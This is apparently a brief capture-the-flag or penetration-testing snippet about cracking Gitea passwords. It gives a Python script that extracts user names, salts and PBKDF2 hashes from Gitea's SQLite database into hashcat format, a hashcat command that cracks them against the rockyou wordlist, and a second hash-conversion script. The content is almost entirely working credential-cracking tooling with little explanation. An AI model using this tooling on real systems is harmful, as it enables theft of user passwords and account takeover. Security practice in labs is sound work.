pbkdf2

Change Gitea Database in format pbkdf2 to base64.

import sqlite3
import base64
import binascii
import hashlib

DB_FILE = "data.db"

QUERY = "SELECT passwd, salt, name FROM user;"

def pbkdf2_format(passwd_hex, salt_hex, iterations, name):
    
    passwd_bytes = binascii.unhexlify(passwd_hex)
    salt_bytes = binascii.unhexlify(salt_hex)

    salt_b64 = base64.b64encode(salt_bytes).decode()

    hash_b64 = base64.b64encode(passwd_bytes).decode()

    return f"{name}:sha256:{iterations}:{salt_b64}:{hash_b64}"

def main():
    conn = sqlite3.connect(DB_FILE)
    cursor = conn.cursor()
    
    cursor.execute(QUERY)
    users = cursor.fetchall()

    with open("hashes.txt", "w") as f:
        for passwd, salt, name in users:
            formatted_hash = pbkdf2_format(passwd, salt, 50000, name)
            print(formatted_hash)  
            f.write(formatted_hash + "\n")  

    conn.close()

if __name__ == "__main__":
    main()

using hashcat to crack it.

hashcat hashes.txt /usr/share/wordlists/rockyou.txt --user

#!/usr/bin/env python3

import base64
import sys

h = ''.join(sys.argv[1:])

if h is None or len(str(h).strip()) == 0:
    print('please provide the hash')
    exit(1)

taa = h.split(':')[:-1]

start = len(':'.join(taa) + ':')


# Salt
iterations = h[start:].split('$')[0]
salt = h[start:].split('$')[1]
sha = h[start:].split('$')[2]

salt_base64 = base64.b64encode(salt.encode()).decode()

# Hash
hash_hex = sha
hash_bytes = bytes.fromhex(hash_hex)
hash_base64 = base64.b64encode(hash_bytes).decode()

print(f'{taa[1]}:{iterations}:{salt_base64}:{hash_base64}')